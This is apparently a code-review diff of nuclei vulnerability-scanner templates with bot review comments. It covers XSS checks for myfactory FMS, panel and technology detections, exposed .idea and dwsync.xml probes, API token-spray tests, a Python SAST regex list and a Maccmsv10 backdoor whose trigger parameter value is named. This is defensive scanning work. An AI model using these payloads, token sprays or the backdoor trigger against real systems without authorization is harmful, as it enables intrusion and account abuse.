|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
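Review bot: The first reference points at `cvename.cgi?name=2021-42566`, which is the sibling `Error`-parameter issue, while this template's `cve-id` is CVE-2021-42565; it should be `- https://nvd.nist.gov/vuln/detail/CVE-2021-42565` (or the mitre entry for 42565). Both myfactory templates in this commit carry the identical `name: myfactory FMS - Reflected XSS`, so their findings are indistinguishable in scan output; `name: myfactory FMS - Reflected XSS via UID parameter` would fix that here. `condition: and` on a single-entry `words` list is a no-op and can be dropped.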
@ -0,0 +1,39 @@
|
||||||
|
id: CVE-2021-42566
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: myfactory FMS - Reflected XSS
|
||||||
|
author: madrobot
|
||||||
|
severity: medium
|
||||||
|
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-42566
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: cve,cve2021,myfactory,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
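Review bot: This template shares its exact `name:` with CVE-2021-42565 in the same commit, so a scan of a host affected by both prints two identical titles; `name: myfactory FMS - Reflected XSS via Error parameter` distinguishes it. `condition: and` under a single-word `words` list does nothing and can be removed. The mitre link `cvename.cgi?name=2021-42566` omits the `CVE-` prefix; `name=CVE-2021-42566` is the canonical form of the identifier.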
@ -11,7 +11,7 @@ dns:
|
||||||
type: CNAME
|
type: CNAME
|
||||||
class: inet
|
class: inet
|
||||||
recursion: true
|
recursion: true
|
||||||
retries: 5
|
retries: 3
|
||||||
|
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -29,3 +29,8 @@ dns:
|
||||||
name: announcekit
|
name: announcekit
|
||||||
words:
|
words:
|
||||||
- "cname.announcekit.app"
|
- "cname.announcekit.app"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: wix
|
||||||
|
words:
|
||||||
|
- "wixdns.net"
|
||||||
|
|
|
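Review bot: The new `wix` matcher fires on any CNAME containing `wixdns.net`, and with `matchers-condition: or` every subdomain that is legitimately hosted on Wix will be reported by this template as a takeover candidate. The commit's own `wix-takeover` template states the takeover only works in an edge case where the account was deleted, which a CNAME string cannot tell apart; consider leaving Wix to that dedicated template, or add a comment here such as `# fingerprint only: a wixdns.net CNAME is not by itself a confirmed takeover`. The rest of the `matchers` list starts outside the hunk.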
@ -0,0 +1,24 @@
|
||||||
|
id: openemr-detect
|
||||||
|
info:
|
||||||
|
name: OpenEMR Product Detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-dork: 'app="OpenEMR"'
|
||||||
|
tags: panel,openemr
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/interface/login/login.php?site=default"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"title":"OpenEMR Product Registration"'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
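Review bot: The metadata key is `shodan-dork` here while the Hikvision template in the same commit uses `shodan-query`; pick one spelling repo-wide so tooling that reads the field finds it. The body match `'"title":"OpenEMR Product Registration"'` is a JSON fragment rather than page text — fine if the login page embeds it in a script block, but a plain `OpenEMR` title or version string would be the more conventional fingerprint, so verify against a real response. The template is named a product detect yet tagged `panel` rather than `tech`; either is defensible, but name and tag should agree.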
@ -10,14 +10,18 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi"
|
- "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi"
|
||||||
|
- "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi"
|
||||||
|
- "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "/dana-na/auth/welcome.cgi"
|
- "/dana-na/auth/welcome.cgi"
|
||||||
part: header
|
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css"
|
- "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css"
|
||||||
part: body
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: redis-commander-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Redis Commander Exposure
|
||||||
|
author: dahse89
|
||||||
|
severity: low
|
||||||
|
reference:
|
||||||
|
- https://joeferner.github.io/redis-commander/
|
||||||
|
- https://github.com/joeferner/redis-commander
|
||||||
|
tags: panel,redis
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- "<title>Redis Commander"
|
||||||
|
- "redisCommanderBearerToken"
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: securityspy-detect
|
||||||
|
info:
|
||||||
|
name: SecuritySpy Camera Detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
metadata:
|
||||||
|
shodan-dork: 'title:SecuritySpy'
|
||||||
|
tags: unauth,iot,securityspy,panel,camera
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>SecuritySpy</title>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
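Review bot: `severity: medium` and the `unauth` tag claim an unauthenticated camera interface, but the matcher only checks that the page title is `SecuritySpy`, which a properly password-protected instance will also return. Either add a matcher that proves unauthenticated access (a stream path or page element available without a session) or lower this to `severity: info` and drop `unauth`, as the other detection templates in this commit do. `shodan-dork` vs `shodan-query` (used elsewhere in this commit) should also be unified.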
@ -0,0 +1,26 @@
|
||||||
|
id: sugarcrm-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Detect SugarCRM Panel
|
||||||
|
author: johnk3r
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=sugarcrm
|
||||||
|
tags: sugarcrm,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
- "{{BaseURL}}/index.php?action=Login&module=Users"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>SugarCRM</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: dwsync-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Dwsync.xml Exposure
|
||||||
|
author: KaizenSecurity
|
||||||
|
severity: info
|
||||||
|
description: The dwsync.xml file is a file generated by Dreamweaver. Where the file contains information related to what files are in the website directory.
|
||||||
|
tags: dwsync,exposure,dreamweaver
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/_notes/dwsync.xml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- application/xml
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<dwsync>'
|
||||||
|
- '</dwsync>'
|
||||||
|
condition: and
|
|
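Review bot: The header matcher accepts only `application/xml`, but servers commonly serve `.xml` as `text/xml`, and with `matchers-condition: and` an otherwise exposed `dwsync.xml` is then rejected. Add `- text/xml` under the header `words` (the default `or` between words handles it), or drop the header check and rely on the body `<dwsync>`/`</dwsync>` pair, which is already specific.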
@ -0,0 +1,27 @@
|
||||||
|
id: idea-folder-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Public .idea Folder containing files with sensitive data
|
||||||
|
author: martincodes-de
|
||||||
|
severity: info
|
||||||
|
description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data.
|
||||||
|
tags: phpstorm,jetbrains,idea,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.idea/deployment.xml"
|
||||||
|
- "{{BaseURL}}/.idea/workspace.xml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<?xml version="
|
||||||
|
- "<project version"
|
||||||
|
part: body
|
||||||
|
condition: and
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: idea-logs-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Public .idea Folder containing http logs
|
||||||
|
author: martincodes-de
|
||||||
|
severity: info
|
||||||
|
description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file
|
||||||
|
tags: phpstorm,jetbrains,idea,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.idea/httpRequests/http-requests-log.http"
|
||||||
|
- "{{BaseURL}}/.idea/httpRequests/http-client.cookies"
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^(GET|POST) https?:\/\/'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "# domain path name value date"
|
||||||
|
part: body
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: python-scanner
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Python Scanner
|
||||||
|
author: majidmc2
|
||||||
|
severity: info
|
||||||
|
description: Indicators for dangerous Python functions
|
||||||
|
reference:
|
||||||
|
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
|
||||||
|
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
|
||||||
|
tags: python,file,sast
|
||||||
|
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- py
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: code-injection
|
||||||
|
regex:
|
||||||
|
- 'exec'
|
||||||
|
- 'eval'
|
||||||
|
- '__import__'
|
||||||
|
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: command-injection
|
||||||
|
regex:
|
||||||
|
- 'subprocess.call\(.*shell=True.*\)'
|
||||||
|
- 'os.system'
|
||||||
|
- 'os.popen'
|
||||||
|
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: untrusted-source
|
||||||
|
regex:
|
||||||
|
- 'pickle.loads'
|
||||||
|
- 'cPickle.loads'
|
||||||
|
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: dangerous-yaml
|
||||||
|
regex:
|
||||||
|
- 'yaml.load'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: sqli
|
||||||
|
regex:
|
||||||
|
- 'cursor.execute'
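Review bot: The extractor regexes are unanchored substrings, so `exec` matches `execute`/`executor`, `eval` matches `evaluate`/`retrieval`, the unescaped `.` in `os.system`, `pickle.loads` and `yaml.load` matches any character, and `cursor.execute` flags every parameterized query as SQLi. Because the `sast` tag means this output is triaged by hand, the noise matters; anchoring on a word boundary and the call parenthesis, escaping the dots, widening `command-injection` to the other `subprocess` entry points that accept `shell=True`, and requiring a formatting operator inside the `cursor.execute` call keeps the same intent with far fewer false hits. nuclei's regex engine is Go RE2, so lookaround is unavailable; `yaml.load` calls that pass a safe `Loader=` will still be reported and need manual review, which the extractor name should say.

```yaml
extractors:
  - type: regex
    name: code-injection
    regex:
      - '\bexec\s*\('
      - '\beval\s*\('
      - '\b__import__\s*\('

  - type: regex
    name: command-injection
    regex:
      - 'subprocess\.(call|run|Popen|check_call|check_output)\s*\(.*shell\s*=\s*True'
      - '\bos\.system\s*\('
      - '\bos\.popen\s*\('

  - type: regex
    name: untrusted-source
    regex:
      - '\b(cPickle|pickle)\.loads?\s*\('

  - type: regex
    name: dangerous-yaml
    regex:
      - '\byaml\.load\s*\('

  - type: regex
    name: sqli
    regex:
      - 'cursor\.execute\s*\([^,)]*(%|\+|\.format\()'
```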
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: Cristi vlad (@cristivlad25)
|
author: Cristi vlad (@cristivlad25)
|
||||||
severity: info
|
severity: info
|
||||||
description: Finds Application YAML files which often contain sensitive information.
|
description: Finds Application YAML files which often contain sensitive information.
|
||||||
|
tags: misconfig
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: wix-takeover
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: harshinsecurity,philippedelteil
|
||||||
|
description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over.
|
||||||
|
severity: high
|
||||||
|
tags: takeover,wix
|
||||||
|
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
condition: or
|
||||||
|
words:
|
||||||
|
- 'Error ConnectYourDomain occurred'
|
||||||
|
- 'wixErrorPagesApp'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 404
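Review bot: The `info` block has `author`, `description`, `severity`, `tags` and `reference` but no `name`, which nuclei treats as a mandatory field, so template validation should reject this file as written; add e.g. `name: Wix Subdomain Takeover`. The description itself says the takeover only works in the edge case of a deleted account, while the `wixErrorPagesApp` word combined with a 404 may well appear on live Wix sites for unknown paths; if that is the case, dropping that word or spelling out the false-positive risk in the description would help triage. A `severity: high` finding that by its own description is usually not exploitable is the kind of report that erodes trust in the template set.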
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: aws-cloudfront-service
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: AWS Cloudfront service detection
|
||||||
|
author: jiheon-dev
|
||||||
|
severity: info
|
||||||
|
tags: aws,tech
|
||||||
|
description: Detect websites using AWS cloudfront service
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
condition: or
|
||||||
|
dsl:
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: hit from cloudfront')"
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')"
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: miss from cloudfront')"
|
||||||
|
- "contains(tolower(all_headers), 'x-cache: error from cloudfront')"
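Review bot: The four `dsl` entries differ only in the CloudFront cache verdict, so a single `contains(tolower(all_headers), 'from cloudfront')` covers all of them and also the verdicts not listed here, such as `LambdaGeneratedResponse from cloudfront`. If a second signal is wanted, `contains(tolower(all_headers), 'x-amz-cf-id')` checks the CloudFront request-id header, which the `x-cache` check misses when that header is stripped. The `condition: or` line then becomes unnecessary.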
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: hikvision-detection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hikvision Detection
|
||||||
|
author: pdteam
|
||||||
|
severity: info
|
||||||
|
tags: tech,hikvision
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/favicon.ico"
|
||||||
|
- "{{BaseURL}}/doc/page/login.asp"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Hikvision Digital Technology"
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
name: favicon
|
||||||
|
dsl:
|
||||||
|
- "status_code==200 && ('999357577' == mmh3(base64_py(body)))"
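Review bot: The two matchers are styled differently: the `dsl` matcher is named `favicon` and checks `status_code==200`, while the word matcher has neither a `name` nor a `part`, so a hit reports nothing about which probe fired and relies on the default response part. Suggest adding `name: login-page` and `part: body` to the word matcher. With `stop-at-first-match: true` and `/favicon.ico` listed first, `/doc/page/login.asp` is only requested when the favicon hash does not match, which looks intentional but deserves a one-line comment above `path:`.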
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: ibm-sterling-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: IBM Sterling File Gateway Detect
|
||||||
|
author: princechaddha
|
||||||
|
severity: info
|
||||||
|
tags: tech,sterling,ibm
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Welcome to IBM Sterling File Gateway"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-adafruit-io
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adafruit IO API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://io.adafruit.com/api/docs/
|
||||||
|
tags: token-spray,adafruit
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://io.adafruit.com/api/v2/user"
|
||||||
|
headers:
|
||||||
|
X-AIO-Key: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "error"
|
||||||
|
negative: true
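Review bot: The only matcher is a negative word match on `error`, so any response that does not contain that substring is reported as a valid token, including HTML from a proxy, a rate-limit or maintenance page, or a 5xx body, and conversely a genuine user record whose fields happen to contain "error" is suppressed. Pairing the negative word matcher with a positive status check under `matchers-condition: and` removes the first class of false positives. The same negative-only pattern is used by the new `api-appveyor`, `api-binance`, `api-dbt`, `api-leanix`, `api-strava`, `api-taiga` and `api-webex` templates, and `api-thecatapi` has the mirror problem (a negative `status: 401` accepts every 429 or 500 as a hit).

```yaml
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # … unchanged: negative word matcher on "error" …
```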
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: api-appveyor
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: AppVeyor API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://www.appveyor.com/docs/api/
|
||||||
|
tags: token-spray,appveyor
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://ci.appveyor.com/api/roles"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Authorization required"
|
||||||
|
negative: true
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: api-binance
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Binance REST API
|
||||||
|
author: geeknik
|
||||||
|
severity: info
|
||||||
|
reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md
|
||||||
|
tags: token-spray,binance
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.binance.com/api/v3/historicalTrades"
|
||||||
|
headers:
|
||||||
|
X-MBX-APIKEY: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Invalid API-key"
|
||||||
|
- "key format invalid"
|
||||||
|
condition: or
|
||||||
|
negative: true
|
|
@ -0,0 +1,19 @@
|
||||||
|
id: api-cooperhewitt
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cooper Hewitt API
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference: https://collection.cooperhewitt.org/api/methods/
|
||||||
|
tags: token-spray,cooperhewitt
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
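Review bot: A bare `status: 200` is a weak signal for a token check; if the Cooper Hewitt API answers bad tokens with a 200 and an error envelope in the body, as many REST APIs do, every sprayed token is reported as valid. Confirm the failure response against the referenced API docs and add a body matcher tied to it (positive on a success field, or negative on the error field, under `matchers-condition: and`). Note also that the token travels in the query string here, so it will land in any intermediate access log; that is dictated by the API, but is worth a comment above `path:`.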
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: api-dbt
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: dbt Cloud API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://docs.getdbt.com/docs/introduction
|
||||||
|
tags: token-spray,dbt
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://cloud.getdbt.com/api/v2/accounts/"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/json
|
||||||
|
Authorization: Token {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Invalid token"
|
||||||
|
- "Authentication credentials were not provided."
|
||||||
|
condition: or
|
||||||
|
negative: true
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: api-leanix
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LeanIX API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://docs.leanix.net/docs/rest-api
|
||||||
|
tags: token-spray,leanix
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://us.leanix.net/services/integration-api/v1/examples/starterExample"
|
||||||
|
- "https://eu.leanix.net/services/integration-api/v1/examples/starterExample"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Credentials are required"
|
||||||
|
negative: true
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-strava
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Strava API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
reference: https://developers.strava.com/docs/getting-started/
|
||||||
|
severity: info
|
||||||
|
tags: token-spray,strava
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://www.strava.com/api/v3/athlete"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Authorization Error"
|
||||||
|
negative: true
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-taiga
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Taiga API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
reference: https://docs.taiga.io/api.html
|
||||||
|
severity: info
|
||||||
|
tags: token-spray,taiga
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.taiga.io/api/v1/application-tokens"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "token_not_valid"
|
||||||
|
negative: true
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: api-thecatapi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: TheCatApi API Test
|
||||||
|
author: daffainfo
|
||||||
|
severity: info
|
||||||
|
reference: https://docs.thecatapi.com/
|
||||||
|
tags: token-spray,thecatapi
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://api.thecatapi.com/v1/votes"
|
||||||
|
headers:
|
||||||
|
x-api-key: "{{token}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
negative: true
|
||||||
|
status:
|
||||||
|
- 401
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: api-webex
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco Webex API Test
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: info
|
||||||
|
reference: https://developer.webex.com/docs/getting-started
|
||||||
|
tags: token-spray,cisco,webex
|
||||||
|
|
||||||
|
self-contained: true
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "https://webexapis.com/v1/rooms"
|
||||||
|
headers:
|
||||||
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "errors"
|
||||||
|
negative: true
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Seeyon WooYun LFR
|
name: Seeyon WooYun LFR
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker.
|
||||||
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
|
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
|
||||||
tags: seeyon,wooyun,lfi
|
tags: seeyon,wooyun,lfi
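Review bot: The new description says attackers can "include the content of locally stored content and disclose it back", which repeats "content" and does not name what is read. Suggest `description: A vulnerability in Seeyon WooYun allows remote attackers to read locally stored files and disclose their content.`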
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Maccmsv10 Backdoor
|
name: Maccmsv10 Backdoor
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'.
|
||||||
tags: maccmsv10,rce
|
tags: maccmsv10,rce
